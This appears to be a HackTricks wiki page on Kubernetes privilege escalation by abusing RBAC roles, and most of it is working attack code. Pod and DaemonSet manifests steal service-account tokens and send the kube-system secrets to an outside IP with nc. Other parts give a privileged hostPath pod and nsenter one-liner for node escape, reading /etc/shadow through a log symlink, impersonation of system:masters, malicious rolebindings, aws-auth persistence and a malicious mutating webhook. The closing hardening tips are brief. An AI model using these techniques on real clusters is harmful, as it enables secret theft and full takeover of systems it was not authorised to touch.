Comment on page
Abusing Roles/ClusterRoles in Kubernetes
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Here you can find some potentially dangerous Roles and ClusterRoles configurations.
Remember that you can get all the supported resources with
kubectl api-resources
Referring as the art of getting access to a different principal within the cluster with different privileges (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically 4 main techniques to escalate privileges:
- Be able to impersonate other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
- Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the kubernetes cluster or to external clouds
- Be able to read secrets as the SAs tokens are stored as secrets
- Be able to escape to the node from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
- A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.
This privilege provides access to any resource with any verb. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If it’s a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: api-resource-verbs-all
rules:
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
Giving a user permission to access any resource can be very risky. But, which verbs allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
- resources: ["*"] verbs: ["create"] – This privilege can create any resource in the cluster, such as pods, roles, etc. An attacker might abuse it to escalate privileges. An example of this can be found in the “Pods Creation” section.
- resources: ["*"] verbs: ["list"] – The ability to list any resource can be used to leak other users’ secrets and might make it easier to escalate privileges. An example of this is located in the “Listing secrets” section.
- resources: ["*"] verbs: ["get"]- This privilege can be used to get secrets from other service accounts.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: api-resource-verbs-all
rules:
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["create", "list", "get"]
An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges.
Here we have a default privileged account named bootstrap-signer with permissions to list all secrets.

The attacker can create a malicious pod that will use the privileged service. Then, abusing the service token, it will ex-filtrate the secrets:

apiVersion: v1
kind: Pod
metadata:
name: alpine
namespace: kube-system
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
In the previous image note how the bootstrap-signer service is used in
serviceAccountname
.So just create the malicious pod and expect the secrets in port 6666:
The following definition gives all the privileges a container can have:
- Privileged access (disabling protections and setting capabilities)
- Disable namespaces hostIPC and hostPid that can help to escalate privileges
- Disable hostNetwork namespace, giving access to steal nodes cloud privileges and better access to networks
- Mount hosts / inside the container
super_privs.yaml
apiVersion: v1
kind: Pod
metadata:
name: ubuntu
labels:
app: ubuntu
spec:
# Uncomment and specify a specific node you want to debug
# nodeName: <insert-node-name-here>
containers:
- image: ubuntu
command:
- "sleep"
- "3600" # adjust this as needed -- use only as long as you need
imagePullPolicy: IfNotPresent
name: ubuntu
securityContext:
allowPrivilegeEscalation: true
privileged: true
#capabilities:
# add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
runAsUser: 0 # run as root (or any other user)
volumeMounts:
- mountPath: /host
name: host-volume
restartPolicy: Never # we want to be intentional about running this pod
hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
volumes:
- name: host-volume
hostPath:
path: /
Create the pod with:
kubectl --token $token create -f mount_root.yaml
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
Now that you can escape to the node check post-exploitation techniques in:
You probably want to be stealthier, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
- Privileged + hostPID
- Privileged only
- hostPath
- hostPID
- hostNetwork
- hostIPC
You can find example of how to create/abuse the previous privileged pods configurations in https://github.com/BishopFox/badPods
If you can create a pod (and optionally a service account) you might be able to obtain privileges in cloud environment by assigning cloud roles to a pod or a service account and then accessing it.
Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance.
For more information check:
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to develop pods and even create pods. So it's possible to abuse them to escalate privileges just like in the previous example.
Suppose we have the permission to create a Daemonset and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the “create pods” section.
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: alpine
namespace: kube-system
spec:
selector:
matchLabels:
name: alpine
template:
metadata:
labels:
name: alpine
spec:
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
volumeMounts:
- mountPath: /root
name: mount-node-root
volumes:
- name: mount-node-root
hostPath:
path: /
In line 6 you can find the object “spec” and children objects such as “template” in line 10. These objects hold the configuration for the task we wish to accomplish. Another thing to notice is the "serviceAccountName" in line 15 and the “containers” object in line 18. This is the part that relates to creating our malicious container.
Kubernetes API documentation indicates that the “PodTemplateSpec” endpoint has the option to create containers. And, as you can see: deployment, daemonsets, statefulsets, replicationcontrollers, replicasets, jobs and cronjobs can all be used to create pods:

So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.
pods/exec
is a resource in kubernetes used for running commands in a shell inside a pod. This privilege is meant for administrators who want to access containers and run commands. It’s just like creating a SSH session for the container.If we have this privilege, we actually get the ability to take control of all the pods. In order to do that, we needs to use the following command:
kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
Note that as you can get inside any pod, you can abuse other pods token just like in Pod Creation exploitation to try to escalate privileges.
This permission allows to forward one local port to one port in the specified pod. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
kubectl port-forward pod/mypod 5000:5000
As indicated in this research, if you can access or create a pod with the hosts
/var/log/
directory mounted on it, you can escape from the container.
This is basically because the when the Kube-API tries to get the logs of a container (using kubectl logs <pod>
), it requests the 0.log
file of the pod using the /logs/
endpoint of the Kubelet service.
The Kubelet service exposes the /logs/
endpoint which is just basically exposing the /var/log
filesystem of the container.Therefore, an attacker with access to write in the /var/log/ folder of the container could abuse this behaviours in 2 ways:
- Modifying the
0.log
file of its container (usually located in/var/logs/pods/namespace_pod_uid/container/0.log
) to be a symlink pointing to/etc/shadow
for example. Then, you will be able to exfiltrate hosts shadow file doing:
kubectl logs escaper
failed to get parse function: unsupported log format: "root::::::::\n"
kubectl logs escaper --tail=2
failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n"
# Keep incrementing tail to exfiltrate the whole file
- If the attacker controls any principal with the permissions to read
nodes/log
, he can just create a symlink in/host-mounted/var/log/sym
to/
and when accessinghttps://<gateway>:10250/logs/sym/
he will lists the hosts root filesystem (changing the symlink can provide access to files).
curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
<a href="bin">bin</a>
<a href="data/">data/</a>
<a href="dev/">dev/</a>
<a href="etc/">etc/</a>
<a href="home/">home/</a>
<a href="init">init</a>
<a href="lib">lib</a>
[...]
A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
If you are lucky enough and the highly privileged capability capability
CAP_SYS_ADMIN
is available, you can just remount the folder as rw:mount -o rw,remount /hostlogs/
allowedHostPaths:
- pathPrefix: "/foo"
readOnly: true
Which was meant to prevent escapes like the previous ones by, instead of using a a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a hosts folder in the container with writable access:
apiVersion: v1
kind: PersistentVolume
metadata:
name: task-pv-volume-vol
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: task-pv-claim-vol
spec:
storageClassName: manual
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
name: task-pv-pod
spec:
volumes:
- name: task-pv-storage-vol
persistentVolumeClaim:
claimName: task-pv-claim-vol
containers:
- name: task-pv-container
image: ubuntu:latest
command: [ "sh", "-c", "sleep 1h" ]
volumeMounts:
- mountPath: "/hostlogs"
name: task-pv-storage-vol
In this example, the service account sa-imper has a binding to a ClusterRole with rules that allow it to impersonate groups and users.


It's possible to list all secrets with
--as=null --as-group=system:master
attributes:
It's also possible to perform the same action via the API REST endpoint:
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
-H "Impersonate-Group: system:masters"\
-H "Impersonate-User: null" \
-H "Accept: application/json" \
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
The listing secrets privilege is a strong capability to have in the cluster. A user with the permission to list secrets can potentially view all the secrets in the cluster – including the admin keys. The secret key is a JWT token encoded in base64.

An attacker that gains access to _list secrets_ in the cluster can use the following curl commands to get all secrets in “kube-system” namespace:
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/

An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the listing secrets permission described above.


Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enlisted.

Each service account has an associated secret with a static (non-changing) prefix and a postfix of a random five-character string token at the end.

The random token structure is 5-character string built from alphanumeric (lower letters and digits) characters. But it doesn’t contain all the letters and digits.
When looking inside the source code, it appears that the token is generated from only 27 characters “bcdfghjklmnpqrstvwxz2456789” and not 36 (a-z and 0-9)


This means that there are 275 = 14,348,907 possibilities for a token.
An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges.
If you have the verbs
create
in the resource certificatesigningrequests
( or at least in certificatesigningrequests/nodeClient
). You can create a new CeSR of a new node.According to the documentation it's possible to auto approve this requests, so in that case you don't need extra permissions. If not, you would need to be able to approve the request, which means update in
certificatesigningrequests/approval
and approve
in signers
with resourceName <signerNameDomain>/<signerNamePath>
or <signerNameDomain>/*
An example of a role with all the required permissions is:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: csr-approver
rules:
- apiGroups:
- certificates.k8s.io
resources:
- certificatesigningrequests
verbs:
- get
- list
- watch
- create
- apiGroups:
- certificates.k8s.io
resources:
- certificatesigningrequests/approval
verbs:
- update
- apiGroups:
- certificates.k8s.io
resources:
- signers
resourceNames:
- example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
verbs:
- approve
So, with the new node CSR approved, you can abuse the special permissions of nodes to steal secrets and escalate privileges.
In this post and this one the GKE K8s TLS Bootstrap configuration is configured with automatic signing and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets.
If you have the mentioned privileges yo could do the same thing. Note that the first example bypasses the error preventing a new node to access secrets inside containers because a node can only access the secrets of containers mounted on it.
The way to bypass this is just to create a node credentials for the node name where the container with the interesting secrets is mounted (but just check how to do it in the first post):
"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73b1-8cj1"
Principals that can modify
configmaps
in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the aws-auth configmap.
The verbs needed are update
and patch
, or create
if configmap wasn't created:# Check if config map exists
get configmap aws-auth -n kube-system -o yaml
## Yaml example
apiVersion: v1
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
data:
mapRoles: |
- rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
username: system:node:{{EC2PrivateDNSName}}
groups:
- system:masters
# Create donfig map is doesn't exist
## Using kubectl and the previous yaml
kubectl apply -f /tmp/aws-auth.yaml
## Using eksctl
eksctl create iamidentitymapping --cluster Testing --region us-east-1 --arn arn:aws:iam::123456789098:role/SomeRoleTestName --group "system:masters" --no-duplicate-arns
# Modify it
kubectl edit -n kube-system configmap/aws-auth
## You can modify it to even give access to users from other accounts
data:
mapRoles: |
- rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
username: system:node:{{EC2PrivateDNSName}}
groups:
- system:masters
mapUsers: |
- userarn: arn:aws:iam::098765432123:user/SomeUserTestName
username: admin
groups:
- system:masters
You can use
aws-auth
for persistence giving access to users from other accounts.However,
aws --profile other_account eks update-kubeconfig --name <cluster-name>
doesn't work from a different acount. But actually aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing
works if you put the ARN of the cluster instead of just the name.
To make kubectl
work, just make sure to configure the victims kubeconfig and in the aws exec args add --profile other_account_role
so kubectl will be using the others account profile to get the token and contact AWS.There are 2 ways to assign K8s permissions to GCP principals. In any case the principal also needs the permission
container.clusters.get
to be able to gather credentials to access the cluster, or you will need to generate your own kubectl config file (follow the next link).When talking to the K8s api endpoint, the GCP auth token will be sent. Then, GCP, through the K8s api endpoint, will first check if the principal (by email) has any access inside the cluster, then it will check if it has any access via GCP IAM.
If any of those are true, he will be responded. If not an error suggesting to give permissions via GCP IAM will be given.
Then, the first method is using GCP IAM, the K8s permissions have their equivalent GCP IAM permissions, and if the principal have it, it will be able to use it.
The second method is assigning K8s permissions inside the cluster to the identifying the user by its email (GCP service accounts included).
Principals that can create TokenRequests (
serviceaccounts/token
) can issue tokens for admin-equivalent SAs (info from here).Principals that can
update
or patch
pods/ephemeralcontainers
can gain code execution on other pods, and potentially break out to their node by adding an ephemeral container with a privileged securityContextPrincipals with any of the verbs
create
, update
or patch
over validatingwebhookconfigurations
or mutatingwebhookconfigurations
might be able to create one of such webhookconfigurations in order to be able to escalate privileges.As you can read in the next section: Built-in Privileged Escalation Prevention, a principal cannot update neither create roles or clusterroles without having himself those new permissions. Except if he has the verb
escalate
over roles
or clusterroles
.
Then he can update/create new roles, clusterroles with better permissions than the ones he has.Principals with access to the
nodes/proxy
subresource can execute code on pods via the Kubelet API (according to this). More information about Kubelet authentication in this page:Principals that can delete pods (
delete
verb over pods
resource), or evict pods (create
verb over pods/eviction
resource), or change pod status (access to pods/status
) and can make other nodes unschedulable (access to nodes/status
) or delete nodes (delete
verb over nodes
resource) and has control over a pod, could steal pods from other nodes so they are executed in the compromised node and the attacker can steal the tokens from those pods.patch_node_capacity(){
curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
}
while true; do patch_node_capacity <id_other_node>; done &
#Launch previous line with all the nodes you need to attack
kubectl delete pods -n kube-system <privileged_pod_name>
Principals that can modify
services/status
may set the status.loadBalancer.ingress.ip
field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to this).Principals with
update
or patch
permissions over nodes/status
or pods/status
, could modify labels to affect scheduling constraints enforced.Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation.
The RBAC API prevents users from escalating privileges by editing roles or role bindings. Because this is enforced at the API level, it applies even when the RBAC authorizer is not in use.A user can only create/update a role if they already have all the permissions contained in the role, at the same scope as the role (cluster-wide for a ClusterRole, within the same namespace or cluster-wide for a Role)
There is an exception to the previous rule. If a principal has the verb
escalate
over roles
or clusterroles
he can increase the privileges of roles and clusterroles even without having the permissions himself.Let’s see an example for such prevention.
A service account named sa7 is in a RoleBinding edit-role-rolebinding. This RoleBinding object has a role named edit-role that has full permissions rules on roles. Theoretically, it means that the service account can edit any role in the default namespace.


There is also an existing role named list-pods. Anyone with this role can list all the pods on the default namespace. The user sa7 should have permissions to edit any roles, so let’s see what happens when it tries to add the “secrets” resource to the role’s resources.

After trying to do so, we will receive an error “forbidden: attempt to grant extra privileges” (Figure 31), because although our sa7 user has permissions to update roles for any resource, it can update the role only for resources that it has permissions over.

Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.
The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.
The following ClusterRole is using the special verb bind that allows a user to create a RoleBinding with admin ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole.

Then it's possible to create
malicious-RoleBinging.json
, which binds the admin role to other compromised service account:{
"apiVersion": "rbac.authorization.k8s.io/v1",
"kind": "RoleBinding",
"metadata": {
"name": "malicious-rolebinding",
"namespaces": "default"
},
"roleRef": {
"apiGroup": "*",
"kind": "ClusterRole",
"name": "admin"
},
"subjects": [
{
"kind": "ServiceAccount",
"name": "compromised-svc"
"namespace": "default"
}
]
}
The purpose of this JSON file is to bind the admin “CluserRole” (line 11) to the compromised service account (line 16).
Now, all we need to do is to send our JSON as a POST request to the API using the following CURL command:
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" \
-H "Content-Type: application/json" \
https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
-d @malicious-RoleBinging.json
After the admin role is bound to the “compromised-svc” service account, we can use the compromised service account token to list secrets. The following CURL command will do this:
curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>"\
-H "Content-Type: application/json"
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
Create your .yaml
kubectl run app --image=bash --command -oyaml --dry-run=client > <appName.yaml> -- sh -c 'ping google.com'
Edit your .yaml and add the uncomment lines:
#apiVersion: v1
#kind: Pod
#metadata:
# name: security-context-demo
#spec:
# securityContext:
# runAsUser: 1000
# runAsGroup: 3000
# fsGroup: 2000
# volumes:
# - name: sec-ctx-vol
# emptyDir: {}
# containers:
# - name: sec-ctx-demo
# image: busybox
command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ]
securityContext:
capabilities:
add: ["NET_ADMIN"]
# volumeMounts:
# - name: sec-ctx-vol
# mountPath: /data/demo
# securityContext:
# allowPrivilegeEscalation: true
See the logs of the proxy:
kubectl logs app -C proxy
An admission controller is a piece of code that intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.
If an attacker somehow manages to inject a Mutationg Adminssion Controller, he will be able to modify already authenticated requests. Being able to potentially privesc, and more usually persist in the cluster.
git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
cd malicious-admission-controller-webhook-demo
./deploy.sh
kubectl get po -n webhook-demo -w
Wait until the webhook server is ready. Check the status:
kubectl get mutatingwebhookconfigurations
kubectl get deploy,svc -n webhook-demo

mutating-webhook-status-check.PNG
Once we have our malicious mutating webhook running, let's deploy a new pod.
kubectl run nginx --image nginx
kubectl get po -w
Wait again, until you see the change in pod status. Now, you can see
ErrImagePull
error. Check the image name with either of the queries.kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
kubectl describe po nginx | grep "Image: "

malicious-admission-controller.PNG
As you can see in the above image, we tried running image
nginx
but the final executed image is rewanthtammana/malicious-image
. What just happened!!?We will unfold what just happened. The
./deploy.sh
script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results.patches = append(patches, patchOperation{
Op: "replace",
Path: "/spec/containers/0/image",
Value: "rewanthtammana/malicious-image",
})
The above snippet replaces the first container image in every pod with
rewanthtammana/malicious-image
.When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself.
From version 1.6+ it is possible to prevent automounting of service account tokens on pods using automountServiceAccountToken: false. It can be used on service accounts or pods.
On a service account it should be added like this:\

It is also possible to use it on the pod:\

When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups.
When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security.
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Last modified 10mo ago